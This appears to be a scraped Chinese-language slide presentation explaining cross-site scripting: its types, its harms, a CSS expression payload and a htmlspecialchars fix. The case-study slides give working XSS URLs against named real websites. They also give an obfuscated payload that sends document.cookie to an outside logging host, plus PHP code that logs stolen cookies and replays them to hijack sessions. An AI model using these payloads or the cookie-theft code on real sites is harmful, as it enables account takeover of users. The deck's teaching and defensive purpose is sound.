More Related Content
Similar to Share xss (20)
Share xss
- 3. Cross site scripting 简称 XSS 原理: 利用网站的漏洞向网站的页面注入 JAVASCRIPT 等脚本内容。 根源:程序的输入、输出没有考虑安全因素。 跨站脚本漏洞原理及其危害
- 4. XSS Cheat Sheet http://ha.ckers.org/xss.html 了解不同浏览器和各种特殊的 HTML 标签如何执行脚本。 XSS 需要使用的关键字 '';!--"<XSS>=&{()} 各类伪协议头: Javascript: vbscript: 跨站脚本漏洞原理及其危害
- 5. CSS 样式表脚本注入 style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46, 120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,125))) expression 变形。 Expression 实际内容 if(window.x!="1"){alert("xss");window.x="1";} 跨站脚本漏洞原理及其危害
- 6. 挂马 插入恶意的脚本内容,运行病毒、木马。 钓鱼 篡改网页内容,骗取账号、密码等诈骗行为。 劫持会话 读取会话 COOKIE, 传送给第三方劫持身份。 XSS Worm 使用 AJAX 技术,做几何趋势的增长传播。 跨站脚本漏洞原理及其危害
- 7. 非持久型 XSS 需要从 URL 传参,点击链接触发。 持久型 XSS XSS 内容已存储到数据库,写到固定页面。 DOM XSS JAVASCRIPT 处理数据输出出现漏洞。 浏览器的漏洞造成的 XSS 跨站脚本漏洞原理及其危害
- 9. 跨站脚本漏洞及案例 <option value="5" > 初级 </option><option value="2" > 中级 </option><option value="3" > 高级 </option> </select> <input name="key" class="f-text" type="text" style="margin-right:15px" value=""><body onload=alert(document.cookie)><""/> <input type="submit" class="f-button" value=" 搜索课程 " /> 搜索结果代码 http://www.speak2me.cn/index.php/Lessons/index/key/%22%3E%3Cbody%20onload%3Dalert(document.cookie)%3E%3C%22/x/39/y/10/ 非持久 XSS 过滤了反斜杠 /
- 10. 跨站脚本漏洞及案例 http://www.speak2me.cn/index.php/share/1804746 HTML 代码 : <div class="share-content"><p> <a href="http://"><body onload=eval(String.fromCharCode(118,97,114,32,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,112,97,105,116,111,117,98,105,110,103,46,99,110,47,108,111,103,46,112,104,112,63,99,61,39,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,39,34))><a a="" target="_blank">http://"> 持久 XSS
- 11. 跨站脚本漏洞及案例 劫持会话 攻击代码 var img = new Image();img.src="http://xss.paitoubing.cn/log.php?c='"+document.cookie+"'" 118,97,114,32,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,112,97,105,116,111,117,98,105,110,103,46,99,110,46,99,110,47,108,111,103,46,112,104,112,63,99,61,39,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,39,34 unicode 转换成 10 进制编码
- 13. 跨站脚本漏洞及案例 通过 GET 方法跳过前端 http://group.wealink.com/groups/search?keyword=%22%3E%3Cbody%20onload=alert(1)%3E%3C%22
- 19. 高级案例 记录会话 PHP 实例代码 <?php if( isset($_REQUEST['c']) ){ file_put_contents('./hi.log', $_SERVER['REQUEST_TIME']."".$_SERVER['QUERY_STRING']."", FILE_APPEND); } echo '200 ok'; 模拟登陆 PHP 实例代码 function _fetchUrl($url,$cookie) { global $ch; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_REFERER,""); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_COOKIE,$cookie); curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'read_header'); $html = curl_exec($ch); curl_close($ch); return $html; }
- 21. 使用 htmlspecialchars 打开引号参数 htmlspecialchars ( $xss, ENT_QUOTES ) & ==> & " ==> " ' ==> ' // 需要打开引号参数 < ==> < > ==> > 跨站脚本漏洞修补建议